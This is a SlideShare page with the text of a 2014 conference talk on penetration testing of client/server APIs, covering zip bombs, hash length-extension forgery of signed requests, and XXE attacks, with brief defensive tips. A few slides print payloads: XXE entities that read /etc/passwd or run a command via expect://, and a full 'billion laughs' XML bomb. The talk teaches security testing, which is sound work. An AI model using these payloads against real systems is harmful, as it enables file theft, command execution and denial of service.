SlideShare a Scribd company logo

CodeFest 2014 - Pentesting client/server API

Sergey Belov
Sergey Belov

http://2014.codefest.ru/lecture/696

TechnologyNews & Politics
1 of 58
Download to read offline
Pentesting client/server API Sergey Belov
$ whoami © 2002—2014, Digital Security 2 • Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, Xakep magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
What are we talking about? © 2002—2014, Digital Security 3 API
What are we talking about? © 2002—2014, Digital Security 4 API
Hacking via API © 2002—2014, Digital Security 5
Hacking via API © 2002—2014, Digital Security 6
Hacking via API © 2002—2014, Digital Security 7 From interface to API methods
Hacking via API © 2002—2014, Digital Security 8
Hacking via API © 2002—2014, Digital Security 9
Hacking via API © 2002—2014, Digital Security 10
Hacking via API © 2002—2014, Digital Security 11
Hacking via API © 2002—2014, Digital Security 12 What should we test? • Logic! • Bypassing restrictions (sqli/xss) • Parameter tampering Developing • Stop hacks and custom implementation in API! Really
Hacking via API © 2002—2014, Digital Security 13
Hacking via API © 2002—2014, Digital Security 14 ZIP
Hacking via API © 2002—2014, Digital Security 15 42 Kb…
Hacking via API © 2002—2014, Digital Security 16 42 Kb… …10 Gb?
Hacking via API © 2002—2014, Digital Security 17 42 Kb… …10 Gb? …100 Gb?
Hacking via API © 2002—2014, Digital Security 18 42 Kb… …10 Gb? …100 Gb? …100 Tb?
Hacking via API © 2002—2014, Digital Security 19 42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb! http://www.unforgettable.dk/
Hacking via API © 2002—2014, Digital Security 20 Say HELLO to ZIP BOMB!
Hacking via API © 2002—2014, Digital Security 21 The evil of JavaScript and
Hacking via API © 2002—2014, Digital Security 22
Hacking via API © 2002—2014, Digital Security 23
Hacking via API © 2002—2014, Digital Security 24 http://habrahabr.ru/post/186160/
Hacking via API © 2002—2014, Digital Security 25 Crypto
Hacking via API © 2002—2014, Digital Security 26 Query signing Sign = sha*(…+DATA+…) APIkey
Hacking via API © 2002—2014, Digital Security 27
Hacking via API © 2002—2014, Digital Security 28 But why?
Hacking via API © 2002—2014, Digital Security 29 Say hello again. To length extension attack
Hacking via API © 2002—2014, Digital Security 30 A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)
Hacking via API © 2002—2014, Digital Security 31 Some have hijacked just 1 request…
Hacking via API © 2002—2014, Digital Security 32 What does the attacker know? • Original data • Sign (token)
Hacking via API © 2002—2014, Digital Security 33 What does the attacker want? Change some data / change params
Hacking via API © 2002—2014, Digital Security 34 A=1&B=2&C=3x80x00x00…x02&C=4
Hacking via API © 2002—2014, Digital Security 35 Can sign new query without API key! Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU sig = md5(uid + params + private_key) http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
Hacking via API © 2002—2014, Digital Security 36 Request hijacking… How?
Hacking via API © 2002—2014, Digital Security 37
Hacking via API © 2002—2014, Digital Security 38
Hacking via API © 2002—2014, Digital Security 39
Hacking via API © 2002—2014, Digital Security 40
Hacking via API © 2002—2014, Digital Security 41
Hacking via API © 2002—2014, Digital Security 42
Hacking via API © 2002—2014, Digital Security 43
Hacking via API © 2002—2014, Digital Security 44
Hacking via API © 2002—2014, Digital Security 45 XML? XML entities!
Hacking via API © 2002—2014, Digital Security 46 DTD Example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;&copyright;</author>
Hacking via API © 2002—2014, Digital Security 47 XML entities? External Entity!
Hacking via API © 2002—2014, Digital Security 48 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
Hacking via API © 2002—2014, Digital Security 49 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id" >]> <foo>&xxe;</foo>
Hacking via API © 2002—2014, Digital Security 50 XML Bombs!
Hacking via API © 2002—2014, Digital Security 51 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
What are we talking about? © 2002—2014, Digital Security 52 Man in the Middle
Hacking via API © 2002—2014, Digital Security 53 Examples?
Hacking via API © 2002—2014, Digital Security 54 2013-11-19 by Reginaldo Silva
Hacking via API © 2002—2014, Digital Security 55 https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
Hacking via API © 2002—2014, Digital Security 56 Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896 Development: • Disable entities
Hacking via API © 2002—2014, Digital Security 57 Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]
twitter.com/sergeybelove sbelov@dsec.ru Digital Security в Москве: (495) 223-07-86 Digital Security в Санкт-Петербурге: (812) 703-15-47 Hacking via API Thanks for your attention! Questions? © 2002—2014, Digital Security 58

Recommended

CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...
CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...
CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...CodeFest
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudMITRE ATT&CK
 
Cryptography
CryptographyCryptography
CryptographySri Manakula Vinayagar Engineering College
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleGuardicore
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?B.Noviansyah - National Public Key Infrastructure: Friend or Foe?
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?idsecconf
 
AISA 2018 Perth Conference: State Of Web Wecurity In 2018
AISA 2018 Perth Conference: State Of Web Wecurity In 2018AISA 2018 Perth Conference: State Of Web Wecurity In 2018
AISA 2018 Perth Conference: State Of Web Wecurity In 2018James Bromberger
 

Recommended

CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...
CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...
CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверног...CodeFest
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudMITRE ATT&CK
 
Cryptography
CryptographyCryptography
CryptographySri Manakula Vinayagar Engineering College
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleGuardicore
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?B.Noviansyah - National Public Key Infrastructure: Friend or Foe?
B.Noviansyah - National Public Key Infrastructure: Friend or Foe?idsecconf
 
AISA 2018 Perth Conference: State Of Web Wecurity In 2018
AISA 2018 Perth Conference: State Of Web Wecurity In 2018AISA 2018 Perth Conference: State Of Web Wecurity In 2018
AISA 2018 Perth Conference: State Of Web Wecurity In 2018James Bromberger
 
Common crypto attacks and secure implementations
Common crypto attacks and secure implementationsCommon crypto attacks and secure implementations
Common crypto attacks and secure implementationsTrupti Shiralkar, CISSP
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APIKevin Hakanson
 
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...MITRE - ATT&CKcon
 
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019kieranjacobsen
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsSecuRing
 
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...CanSecWest
 
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE - ATT&CKcon
 
Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...Trupti Shiralkar, CISSP
 
Fade from Whitehat... to Black
Fade from Whitehat... to BlackFade from Whitehat... to Black
Fade from Whitehat... to BlackBeau Bullock
 
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanAre your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanEC-Council
 
Practical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for DevelopersPractical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for DevelopersGökhan Şengün
 
Speed and security for your PHP application
Speed and security for your PHP applicationSpeed and security for your PHP application
Speed and security for your PHP applicationZend by Rogue Wave Software
 
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsDEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsCisco DevNet
 
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwearCsw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwearCanSecWest
 
Develop microservices in php
Develop microservices in phpDevelop microservices in php
Develop microservices in phpZend by Rogue Wave Software
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsOpenDNS
 
Network security-primer-9544
Network security-primer-9544Network security-primer-9544
Network security-primer-9544Hfz Mushtaq
 
2015 Security Report
2015 Security Report 2015 Security Report
2015 Security Report Check Point Software Technologies
 
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)ColdFusionConference
 
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...MITRE - ATT&CKcon
 
очир абушинов
очир абушиновочир абушинов
очир абушиновAlexei Lupan
 
Опыт организации тестирования безопасности Web приложений в компании
Опыт организации тестирования безопасности Web приложений в компанииОпыт организации тестирования безопасности Web приложений в компании
Опыт организации тестирования безопасности Web приложений в компанииSQALab
 

More Related Content

What's hot

Common crypto attacks and secure implementations
Common crypto attacks and secure implementationsCommon crypto attacks and secure implementations
Common crypto attacks and secure implementationsTrupti Shiralkar, CISSP
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APIKevin Hakanson
 
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...MITRE - ATT&CKcon
 
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019kieranjacobsen
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsSecuRing
 
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...CanSecWest
 
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE - ATT&CKcon
 
Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...Trupti Shiralkar, CISSP
 
Fade from Whitehat... to Black
Fade from Whitehat... to BlackFade from Whitehat... to Black
Fade from Whitehat... to BlackBeau Bullock
 
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanAre your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanEC-Council
 
Practical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for DevelopersPractical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for DevelopersGökhan Şengün
 
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsDEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsCisco DevNet
 
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwearCsw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwearCanSecWest
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsOpenDNS
 
Network security-primer-9544
Network security-primer-9544Network security-primer-9544
Network security-primer-9544Hfz Mushtaq
 
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)ColdFusionConference
 
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...MITRE - ATT&CKcon
 

What's hot (20)

Common crypto attacks and secure implementations
Common crypto attacks and secure implementationsCommon crypto attacks and secure implementations
Common crypto attacks and secure implementations
 
Securing TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography APISecuring TodoMVC Using the Web Cryptography API
Securing TodoMVC Using the Web Cryptography API
 
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
 
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS Apps
 
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
 
MITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - DecemberMITRE ATTACKCon Power Hour - December
MITRE ATTACKCon Power Hour - December
 
Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...
 
Fade from Whitehat... to Black
Fade from Whitehat... to BlackFade from Whitehat... to Black
Fade from Whitehat... to Black
 
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanAre your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
 
Practical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for DevelopersPractical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for Developers
 
Speed and security for your PHP application
Speed and security for your PHP applicationSpeed and security for your PHP application
Speed and security for your PHP application
 
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted ApplicationsDEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
DEVNET-1190 Targeted Threat (APT) Defense for Hosted Applications
 
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwearCsw2016 chaykin having_funwithsecuremessengers_and_androidwear
Csw2016 chaykin having_funwithsecuremessengers_and_androidwear
 
Develop microservices in php
Develop microservices in phpDevelop microservices in php
Develop microservices in php
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower Costs
 
Network security-primer-9544
Network security-primer-9544Network security-primer-9544
Network security-primer-9544
 
2015 Security Report
2015 Security Report 2015 Security Report
2015 Security Report
 
Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)Java script and web cryptography (cf.objective)
Java script and web cryptography (cf.objective)
 
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
 

Viewers also liked

очир абушинов
очир абушиновочир абушинов
очир абушиновAlexei Lupan
 
Опыт организации тестирования безопасности Web приложений в компании
Опыт организации тестирования безопасности Web приложений в компанииОпыт организации тестирования безопасности Web приложений в компании
Опыт организации тестирования безопасности Web приложений в компанииSQALab
 
CodeFest 2012 - Пентест на стероидах
CodeFest 2012 - Пентест на стероидахCodeFest 2012 - Пентест на стероидах
CodeFest 2012 - Пентест на стероидахSergey Belov
 
Тестирование защищенности веб-приложений
Тестирование защищенности веб-приложенийТестирование защищенности веб-приложений
Тестирование защищенности веб-приложенийSQALab
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
(Не)безопасный frontend
(Не)безопасный frontend(Не)безопасный frontend
(Не)безопасный frontendSergey Belov
 
ZeroNights - SmartTV
ZeroNights - SmartTV ZeroNights - SmartTV
ZeroNights - SmartTV Sergey Belov
 
современная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложенийсовременная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложенийSergey Belov
 
Сергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL InjectionСергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL InjectionSQALab
 
Автоматизация тестирования веб-сервисов посредством SOAP UI
Автоматизация тестирования веб-сервисов посредством SOAP UIАвтоматизация тестирования веб-сервисов посредством SOAP UI
Автоматизация тестирования веб-сервисов посредством SOAP UIautomated-testing.info
 
Тестирование безопасности: PHP инъекция
Тестирование безопасности: PHP инъекцияТестирование безопасности: PHP инъекция
Тестирование безопасности: PHP инъекцияSQALab
 
Практика тестирования web сервисов
Практика тестирования web сервисовПрактика тестирования web сервисов
Практика тестирования web сервисовSQALab
 
Онлайн безопасность - фактор #1 в SEO
Онлайн безопасность - фактор #1 в SEOОнлайн безопасность - фактор #1 в SEO
Онлайн безопасность - фактор #1 в SEOYuriy Titkov
 
якимович нагрузочное тестирование клиент серверных приложений
якимович нагрузочное тестирование клиент серверных приложенийякимович нагрузочное тестирование клиент серверных приложений
якимович нагрузочное тестирование клиент серверных приложенийsef2009
 
Нагрузочное тестирование клиент-серверных приложений
Нагрузочное тестирование клиент-серверных приложенийНагрузочное тестирование клиент-серверных приложений
Нагрузочное тестирование клиент-серверных приложенийSQALab
 
Ui testing how intel does this
Ui testing how intel does thisUi testing how intel does this
Ui testing how intel does thisAlexei Lupan
 
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.Кейс: Как два сеошника за год сделали +$2М к обороту компаний.
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.Andrey Kapeltsov
 
Contacto server API in PHP
Contacto server API in PHPContacto server API in PHP
Contacto server API in PHPHem Shrestha
 

Viewers also liked (20)

очир абушинов
очир абушиновочир абушинов
очир абушинов
 
Опыт организации тестирования безопасности Web приложений в компании
Опыт организации тестирования безопасности Web приложений в компанииОпыт организации тестирования безопасности Web приложений в компании
Опыт организации тестирования безопасности Web приложений в компании
 
CodeFest 2012 - Пентест на стероидах
CodeFest 2012 - Пентест на стероидахCodeFest 2012 - Пентест на стероидах
CodeFest 2012 - Пентест на стероидах
 
Тестирование защищенности веб-приложений
Тестирование защищенности веб-приложенийТестирование защищенности веб-приложений
Тестирование защищенности веб-приложений
 
Nginx warhead
Nginx warheadNginx warhead
Nginx warhead
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
(Не)безопасный frontend
(Не)безопасный frontend(Не)безопасный frontend
(Не)безопасный frontend
 
ZeroNights - SmartTV
ZeroNights - SmartTV ZeroNights - SmartTV
ZeroNights - SmartTV
 
современная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложенийсовременная практика статического анализа безопасности кода веб приложений
современная практика статического анализа безопасности кода веб приложений
 
Сергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL InjectionСергей Полаженко - Security Testing: SQL Injection
Сергей Полаженко - Security Testing: SQL Injection
 
Автоматизация тестирования веб-сервисов посредством SOAP UI
Автоматизация тестирования веб-сервисов посредством SOAP UIАвтоматизация тестирования веб-сервисов посредством SOAP UI
Автоматизация тестирования веб-сервисов посредством SOAP UI
 
Тестирование безопасности: PHP инъекция
Тестирование безопасности: PHP инъекцияТестирование безопасности: PHP инъекция
Тестирование безопасности: PHP инъекция
 
Практика тестирования web сервисов
Практика тестирования web сервисовПрактика тестирования web сервисов
Практика тестирования web сервисов
 
Онлайн безопасность - фактор #1 в SEO
Онлайн безопасность - фактор #1 в SEOОнлайн безопасность - фактор #1 в SEO
Онлайн безопасность - фактор #1 в SEO
 
якимович нагрузочное тестирование клиент серверных приложений
якимович нагрузочное тестирование клиент серверных приложенийякимович нагрузочное тестирование клиент серверных приложений
якимович нагрузочное тестирование клиент серверных приложений
 
Нагрузочное тестирование клиент-серверных приложений
Нагрузочное тестирование клиент-серверных приложенийНагрузочное тестирование клиент-серверных приложений
Нагрузочное тестирование клиент-серверных приложений
 
Ui testing how intel does this
Ui testing how intel does thisUi testing how intel does this
Ui testing how intel does this
 
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.Кейс: Как два сеошника за год сделали +$2М к обороту компаний.
Кейс: Как два сеошника за год сделали +$2М к обороту компаний.
 
Contacto server API in PHP
Contacto server API in PHPContacto server API in PHP
Contacto server API in PHP
 
API
APIAPI
API
 

Similar to CodeFest 2014 - Pentesting client/server API

Microservices Manchester: Security, Microservces and Vault by Nicki Watt
Microservices Manchester: Security, Microservces and Vault by Nicki WattMicroservices Manchester: Security, Microservces and Vault by Nicki Watt
Microservices Manchester: Security, Microservces and Vault by Nicki WattOpenCredo
 
End to End Security - Check Point
End to End Security - Check PointEnd to End Security - Check Point
End to End Security - Check PointHarry Gunns
 
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...
TDC2018SP | Trilha Mobile - Case VC+: Como tornar seguro um aplicativo mobile...tdc-globalcode
 
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...
Case VC+: Como tornar seguro um aplicativo mobile payment sem penalizar a exp...Márcio Rosa
 
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...
[WSO2Con USA 2018] Design and Implementation of the Veridium Authenticator: A...WSO2
 
Expanding APIs beyond the Web
Expanding APIs beyond the WebExpanding APIs beyond the Web
Expanding APIs beyond the WebTim Messerschmidt
 
Check point presentation june 2014
Check point presentation june 2014Check point presentation june 2014
Check point presentation june 2014David Berkelmans
 
Steam Learn: HTTPS and certificates explained
Steam Learn: HTTPS and certificates explainedSteam Learn: HTTPS and certificates explained
Steam Learn: HTTPS and certificates explainedinovia
 
Cisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco APIs: An Interactive Assistant for the Web2Day Developer Conference
Cisco APIs: An Interactive Assistant for the Web2Day Developer ConferenceCisco DevNet
 
2018 06 Presentation Cloudguard IaaS de Checkpoint
